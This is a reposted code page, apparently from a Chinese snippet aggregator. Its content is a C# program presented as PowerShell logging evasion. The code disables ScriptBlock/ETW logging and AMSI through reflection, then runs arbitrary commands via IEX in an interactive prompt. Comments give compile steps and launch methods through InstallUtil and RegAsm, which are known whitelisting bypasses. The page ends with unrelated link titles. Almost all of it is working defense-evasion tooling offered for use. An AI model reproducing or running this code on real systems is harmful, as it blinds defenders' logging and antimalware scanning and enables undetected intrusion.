csharp 没有Powershell与Transcript Logging Evasion&ScriptBlock Logging Evasion - eventid 4103,4104

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了csharp 没有Powershell与Transcript Logging Evasion&ScriptBlock Logging Evasion - eventid 4103,4104相关的知识,希望对你有一定的参考价值。

using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;

namespace TranscriptBypass
{
    // Compiling with CSC.exe v4.0.30319 or v3.5
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
    // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll

    // Running via InstallUtil.exe
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\temp\posh.exe

    // Compiling with CSC.exe v4.0.30319 or v3.5 for use with regasm.exe
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\Temp\posh.dll C:\Temp\posh.cs /reference:System.Management.Automation.dll
    // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /target:library /out:c:\temp\posh.dll C:\temp\posh.cs /reference:System.Management.Automation.dll

    // Running via RegAsm.exe
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\temp\posh.dll

    public class Program
    {
        public static Runspace newrunspace;
        public static void startrunspace()
        {
            newrunspace = RunspaceFactory.CreateRunspace();
            newrunspace.Open();
            var cmd = new System.Management.Automation.PSVariable("c");
            newrunspace.SessionStateProxy.PSVariable.Set(cmd);
            var output = new System.Management.Automation.PSVariable("o");
            newrunspace.SessionStateProxy.PSVariable.Set(output);
            
        }
        public static string InvokeAutomation(string cmd)
        {
            RunspaceInvoke scriptInvoker = new RunspaceInvoke(newrunspace);
            Pipeline pipeline = newrunspace.CreatePipeline();
            newrunspace.SessionStateProxy.SetVariable("c", cmd);

            //disable scriptblock loging using reflection
            //https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
            var psEtwLogProvider = newrunspace.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (psEtwLogProvider != null)
            {
                var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                etwProvider.SetValue(null, eventProvider);
            }

            //disable amsi using reflection
            //https://twitter.com/mattifestation/status/735261176745988096?lang=en
            var amsi = newrunspace.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
            amsifield.SetValue(null, true);

            //disable constrained mode
            //var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
            //fi.SetValue(null, SystemEnforcementMode.None);

            if (cmd == "$a;")
            {
                return "";
            }
            else
            {
                pipeline.Commands.AddScript("$o = IEX $c | Out-String");
            }
            
            Collection<PSObject> results1 = pipeline.Invoke();
            object results2 = newrunspace.SessionStateProxy.GetVariable("o");
            return results2.ToString();

        }
        public static void Main()
        {
            try
            {
                startrunspace();
                string ps = null;
                Console.Write("PS>");
                while (!String.IsNullOrEmpty(ps = "$a;" + Console.ReadLine().Trim()))
                {
                    try
                    {
                        Console.WriteLine(InvokeAutomation(ps));
                    }
                    catch (Exception ex)
                    {
                        Console.Write(ex.Message);
                    }
                    Console.Write("PS>");
                }
            }
            catch
            {
                Main();
            }
        }
    }
}

以上是关于csharp 没有Powershell与Transcript Logging Evasion&ScriptBlock Logging Evasion - eventid 4103,4104的主要内容,如果未能解决你的问题,请参考以下文章

windows中cmd与powershell

Powershell 和 schtask 与具有空间的任务

PowerShell UICulture 与 Windows 设置

模拟10-15 题解 trans

sql_mode :(STRICT_TRANS_TABLES与STRICT_ALL_TABLES 区别)

如何使用pybabel在jinja 2.10 {%trans%}中转义'%'字符?